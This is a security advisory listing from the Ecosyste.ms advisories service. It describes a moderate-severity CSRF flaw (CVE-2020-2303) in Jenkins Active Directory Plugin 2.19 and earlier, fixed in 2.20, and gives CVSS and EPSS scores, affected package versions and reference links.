Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0yd2Y1LTRtZjctdm1oM84AAmgX
CSRF vulnerability in Jenkins Active Directory Plugin
Jenkins Active Directory Plugin 2.19 and earlier does not require POST requests for multiple HTTP endpoints implementing connection and authentication tests, resulting in cross-site request forgery (CSRF) vulnerabilities.
This vulnerability allows attackers to perform connection tests, connecting to attacker-specified or previously configured Active Directory servers using attacker-specified credentials.
Active Directory Plugin 2.20 requires POST requests for the affected HTTP endpoints.
Permalink: https://github.com/advisories/GHSA-2wf5-4mf7-vmh3JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yd2Y1LTRtZjctdm1oM84AAmgX
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 2 years ago
Updated: 12 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
EPSS Percentage: 0.00062
EPSS Percentile: 0.27513
Identifiers: GHSA-2wf5-4mf7-vmh3, CVE-2020-2303
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2303
- https://www.jenkins.io/security/advisory/2020-11-04/#SECURITY-2126
- http://www.openwall.com/lists/oss-security/2020/11/04/6
- https://github.com/jenkinsci/active-directory-plugin/commit/3558971237b80e71e913ead9e82a722e9d5576b8
- https://github.com/advisories/GHSA-2wf5-4mf7-vmh3
Blast Radius: 1.0
Affected Packages
maven:org.jenkins-ci.plugins:active-directory
Affected Version Ranges: < 2.20Fixed in: 2.20